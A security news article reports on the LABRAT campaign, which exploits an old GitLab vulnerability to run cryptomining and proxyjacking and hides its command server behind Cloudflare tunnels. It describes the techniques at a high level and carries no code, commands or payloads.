Cyber security researchers have uncovered a stealthy operation, dubbed LABRAT, which combines cryptomining and proxyjacking to generate income with control obfuscated by legitimate services.
Both the stealthy approach and the addition of financially-motivated proxyjacking make this campaign stand out from other cryptomining, ransomware, and data exfiltration attacks.
The campaign makes use of a 2021 vulnerability in GitLab - CVE-2021-22205 - to enable remote command execution on a victim’s server. CVE-2021-22205 itself was patched by GitLab in 2021, meaning the impact is restricted to customers remaining on vulnerable versions.
Once the vulnerability is exploited, the attacker executes a simple curl command to download a malicious script from a command and control (C2) server. The script disables defenses, downloads malicious binaries, and attempts lateral movement.
Proxyjacking has grown in popularity throughout 2023 and is a way for criminals to monetize a victim’s infrastructure or, as researchers put it, “‘rent’ the compromised system to a proxy network”.
While the technique isn’t a novel one, putting it to use strictly for monetary gain is a practice only recently observed.
Effectively, the compromised IP address is sold, and the affected system is put to work. While cryptomining can result in financial damages if not detected and stopped quickly, the reputational damage from proxyjacking, should the compromised infrastructure be put to work in an attack or other criminal activities, can be significant.
Because proxyjacking uses only a fraction of the system load of cryptomining, and makes use of spare bandwidth, detection is difficult.
Manage risk and cyber security with an integrated modern cloud-based platform.
Sysdig previously noted the potential financial rewards from proxyjacking in an April previous report, with access via the Log4j vulnerability rather than the GitLab exploit used in this instance. The passive income from 100 compromised IP addresses documented then could be as much as $1,000 per month, it said.
Akamai also noted the rise of proxyjacking with a strict project motive, and described it as “the latest cybercriminal side hustle”. In Akamai’s report, vulnerable SSH servers were targeted and Docker services were launched to share the victim’s bandwidth for financial gain.
How the attack works
The attackers were observed to be using two noteworthy techniques in order to obscure their activities.
One is an attempt to obfuscate their C2 location by using subdomains on the trycloudflare.com domain. The domain is a legitimate one operated by Cloudflare but, according to researchers, is also used by attackers.
“Using the legitimate TryCloudFlare infrastructure can make it difficult for defenders to identify it as malicious, especially if it is used in normal operations,” said researchers at Sysdig.
Researchers also noted the use of compiled binaries, written in Go and .Net, rather than the simpler-to-create scripts. This approach, according to Miguel Hernandez, threat research engineer at Sysdig, “allowed them to hide more effectively”.
The goal of the attack is cryptomining and proxyjacking - the researchers noted that the latter was Russian-affiliated.
The attack serves as both a reminder of the importance of keeping systems up to date - in this instance a 2021 GitLab vulnerability was exploited - and also of the stealth employed by some threat actors. The financial reward was proportional to the amount of time the malicious code persisted.
How does the proxyjacking service get installed?
The operation makes use of private GitLab repositories to host the malicious binaries required. In this instance, the open source tool Global Socket - which has legitimate uses - is used to provide a backdoor.
The proxyjacking service itself is related to a new Russian proxyware service called ProxyLite[.]ru, according to initial research by the team. Interestingly, the service makes use of .NET Core and works on multiple platforms. It is also heavily obfuscated. The team reported that the resulting DLL was undetectable by VirusTotal at time of report writing.
However, a drawback of this approach is that victims must have the .NET Core libraries in order for the binaries to run.
Of the cryptomining and proxyjacking aims in today’s report, Hernandez said: “These may not be the only goals of the attacker as their malware gives them backdoor access to the compromised systems”.
“This kind of access could lend itself to other attacks, such as data theft, leaks, or ransomware”.
